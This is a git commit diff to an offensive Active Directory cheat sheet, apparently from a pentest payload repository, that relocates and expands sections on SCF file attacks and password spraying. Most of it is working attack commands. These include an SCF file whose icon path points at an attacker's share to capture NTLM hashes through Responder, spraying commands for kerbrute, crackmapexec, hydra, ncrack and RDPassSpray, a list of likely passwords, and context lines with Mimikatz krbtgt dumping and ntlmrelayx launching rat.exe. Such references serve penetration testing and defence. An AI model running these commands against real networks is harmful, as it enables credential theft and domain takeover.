Password spray + AD summary re-org

This commit is contained in:
Swissky 2019-11-14 23:37:51 +01:00
parent 7f266bfda8
commit 3a384c34aa

View File

@ -6,6 +6,7 @@
* [Most common paths to AD compromise](#most-common-paths-to-ad-compromise) * [Most common paths to AD compromise](#most-common-paths-to-ad-compromise)
* [MS14-068 (Microsoft Kerberos Checksum Validation Vulnerability)](#ms14-068-microsoft-kerberos-checksum-validation-vulnerability) * [MS14-068 (Microsoft Kerberos Checksum Validation Vulnerability)](#ms14-068-microsoft-kerberos-checksum-validation-vulnerability)
* [Open Shares](#open-shares) * [Open Shares](#open-shares)
* [SCF file attack against writeable share](#scf-file-attack-against-writeable-share)
* [GPO - Pivoting with Local Admin & Passwords in SYSVOL](#gpo---pivoting-with-local-admin--passwords-in-sysvol) * [GPO - Pivoting with Local Admin & Passwords in SYSVOL](#gpo---pivoting-with-local-admin--passwords-in-sysvol)
* [Dumping AD Domain Credentials](#dumping-ad-domain-credentials-systemrootntdsntdsdit) * [Dumping AD Domain Credentials](#dumping-ad-domain-credentials-systemrootntdsntdsdit)
* Using ndtsutil * Using ndtsutil
@ -14,6 +15,7 @@
* Using DiskShadow * Using DiskShadow
* Using Mimikatz DCSync * Using Mimikatz DCSync
* Using Mimikatz sekurlsa * Using Mimikatz sekurlsa
* [Password spraying](#password-spraying)
* [Password in AD User comment](#password-in-ad-user-comment) * [Password in AD User comment](#password-in-ad-user-comment)
* [Pass-the-Ticket Golden Tickets](#pass-the-ticket-golden-tickets) * [Pass-the-Ticket Golden Tickets](#pass-the-ticket-golden-tickets)
* [Pass-the-Ticket Silver Tickets](#pass-the-ticket-silver-tickets) * [Pass-the-Ticket Silver Tickets](#pass-the-ticket-silver-tickets)
@ -28,7 +30,6 @@
* [SMB Signing Disabled and IPv6](#smb-signing-disabled-and-ipv6) * [SMB Signing Disabled and IPv6](#smb-signing-disabled-and-ipv6)
* [Drop the MIC](#drop-the-mic) * [Drop the MIC](#drop-the-mic)
* [Ghost Potato](#ghost-potato) * [Ghost Potato](#ghost-potato)
* [SCF file attack against writeable share](#scf-file-attack-against-writeable-share)
* [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage) * [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage)
* [Trust relationship between domains](#trust-relationship-between-domains) * [Trust relationship between domains](#trust-relationship-between-domains)
* [Child Domain to Forest Compromise - SID Hijacking](#child-domain-to-forest-compromise---sid-hijacking) * [Child Domain to Forest Compromise - SID Hijacking](#child-domain-to-forest-compromise---sid-hijacking)
@ -36,7 +37,6 @@
* [Resource-Based Constrained Delegation](#resource-based-constrained-delegation) * [Resource-Based Constrained Delegation](#resource-based-constrained-delegation)
* [Relay delegation with mitm6](#relay-delegation-with-mitm6) * [Relay delegation with mitm6](#relay-delegation-with-mitm6)
* [PrivExchange attack](#privexchange-attack) * [PrivExchange attack](#privexchange-attack)
* [Password spraying](#password-spraying)
* [Extract accounts from /etc/krb5.keytab](#extract-accounts-from-etc-krb5-keytab) * [Extract accounts from /etc/krb5.keytab](#extract-accounts-from-etc-krb5-keytab)
* [PXE Boot image attack](#pxe-boot-image-attack) * [PXE Boot image attack](#pxe-boot-image-attack)
* [Impersonating Office 365 Users on Azure AD Connect](#impersonating-office-365-users-on-azure-ad-connect) * [Impersonating Office 365 Users on Azure AD Connect](#impersonating-office-365-users-on-azure-ad-connect)
@ -264,6 +264,18 @@ smbmount //X.X.X.X/c$ /mnt/remote/ -o username=user,password=pass,rw
sudo mount -t cifs -o username=<user>,password=<pass> //<IP>/Users folder sudo mount -t cifs -o username=<user>,password=<pass> //<IP>/Users folder
``` ```
### SCF file attack against writeable share
Drop the following `something.scf` file inside a share and start listening with Responder : `responder -wrf --lm -v -I eth0`
```powershell
[Shell]
Command=2
IconFile=\\10.10.XX.XX\Share\test.ico
[Taskbar]
Command=ToggleDesktop
```
### GPO - Pivoting with Local Admin & Passwords in SYSVOL ### GPO - Pivoting with Local Admin & Passwords in SYSVOL
:triangular_flag_on_post: GPO Priorization : Organization Unit > Domain > Site > Local :triangular_flag_on_post: GPO Priorization : Organization Unit > Domain > Site > Local
@ -436,6 +448,49 @@ sekurlsa::krbtgt
lsadump::lsa /inject /name:krbtgt lsadump::lsa /inject /name:krbtgt
``` ```
### Password spraying
Password spraying refers to the attack method that takes a large number of usernames and loops them with a single password.
> The builtin Administrator account (RID:500) cannot be locked out of the system no matter how many failed logon attempts it accumulates.
#### Using `kerbrute`, a tool to perform Kerberos pre-auth bruteforcing.
> Kerberos pre-authentication errors are not logged in Active Directory with a normal Logon failure event (4625), but rather with specific logs to Kerberos pre-authentication failure (4771).
```powershell
root@kali:~$ ./kerbrute_linux_amd64 userenum -d lab.ropnop.com usernames.txt
root@kali:~$ ./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com domain_users.txt Password123
root@kali:~$ python kerbrute.py -domain jurassic.park -users users.txt -passwords passwords.txt -outputfile jurassic_passwords.txt
```
#### Using `crackmapexec` and `mp64` to generate passwords and spray them against SMB services on the network.
```powershell
crackmapexec smb 10.0.0.1/24 -u Administrator -p `(./mp64.bin Pass@wor?l?a)`
```
#### Using [RDPassSpray](https://github.com/xFreed0m/RDPassSpray) to target RDP services.
```powershell
python3 RDPassSpray.py -u [USERNAME] -p [PASSWORD] -d [DOMAIN] -t [TARGET IP]
```
#### Using [hydra]() and [ncrack]() to target RDP services.
```powershell
hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://10.10.10.10
ncrack connection-limit 1 -vv --user administrator -P password-file.txt rdp://10.10.10.10
```
Most of the time the best passwords to spray are :
- Password123
- Welcome1
- $Companyname1 : $Microsoft1
- SeasonYear : Winter2019*
### Password in AD User comment ### Password in AD User comment
```powershell ```powershell
@ -820,18 +875,6 @@ Using a modified version of ntlmrelayx : https://shenaniganslabs.io/files/impack
ntlmrelayx -smb2support --no-smb-server --gpotato-startup rat.exe ntlmrelayx -smb2support --no-smb-server --gpotato-startup rat.exe
``` ```
### SCF file attack against writeable share
Drop the following `something.scf` file inside a share and start listening with Responder : `responder -wrf --lm -v -I eth0`
```powershell
[Shell]
Command=2
IconFile=\\10.10.XX.XX\Share\test.ico
[Taskbar]
Command=ToggleDesktop
```
### Dangerous Built-in Groups Usage ### Dangerous Built-in Groups Usage
If you do not want modified ACLs to be overwrite every hour, you should change ACL template on the object CN=AdminSDHolder,CN=System, " or set "adminCount" attribute to 0 for the required objec If you do not want modified ACLs to be overwrite every hour, you should change ACL template on the object CN=AdminSDHolder,CN=System, " or set "adminCount" attribute to 0 for the required objec
@ -1089,46 +1132,6 @@ python Exchange2domain.py -ah attackterip -ap listenport -u user -p password -d
python Exchange2domain.py -ah attackterip -u user -p password -d domain.com -th DCip --just-dc-user krbtgt MailServerip python Exchange2domain.py -ah attackterip -u user -p password -d domain.com -th DCip --just-dc-user krbtgt MailServerip
``` ```
### Password spraying
Password spraying refers to the attack method that takes a large number of usernames and loops them with a single password.
> The builtin Administrator account (RID:500) cannot be locked out of the system no matter how many failed logon attempts it accumulates.
#### Using `kerbrute`, a tool to perform Kerberos pre-auth bruteforcing.
> Kerberos pre-authentication errors are not logged in Active Directory with a normal Logon failure event (4625), but rather with specific logs to Kerberos pre-authentication failure (4771).
```powershell
root@kali:~$ ./kerbrute_linux_amd64 userenum -d lab.ropnop.com usernames.txt
root@kali:~$ ./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com domain_users.txt Password123
root@kali:~$ python kerbrute.py -domain jurassic.park -users users.txt -passwords passwords.txt -outputfile jurassic_passwords.txt
```
#### Using `crackmapexec` and `mp64` to generate passwords and spray them against SMB services on the network.
```powershell
crackmapexec smb 10.0.0.1/24 -u Administrator -p `(./mp64.bin Pass@wor?l?a)`
```
#### Using [RDPassSpray](https://github.com/xFreed0m/RDPassSpray) to target RDP services.
```powershell
python3 RDPassSpray.py -u [USERNAME] -p [PASSWORD] -d [DOMAIN] -t [TARGET IP]
```
#### Using [hydra]() and [ncrack]() to target RDP services.
```powershell
hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://10.10.10.10
ncrack connection-limit 1 -vv --user administrator -P password-file.txt rdp://10.10.10.10
```
Most of the time the best passwords to spray are :
- Password1
- Welcome1
- $Companyname1
### Extract accounts from /etc/krb5.keytab ### Extract accounts from /etc/krb5.keytab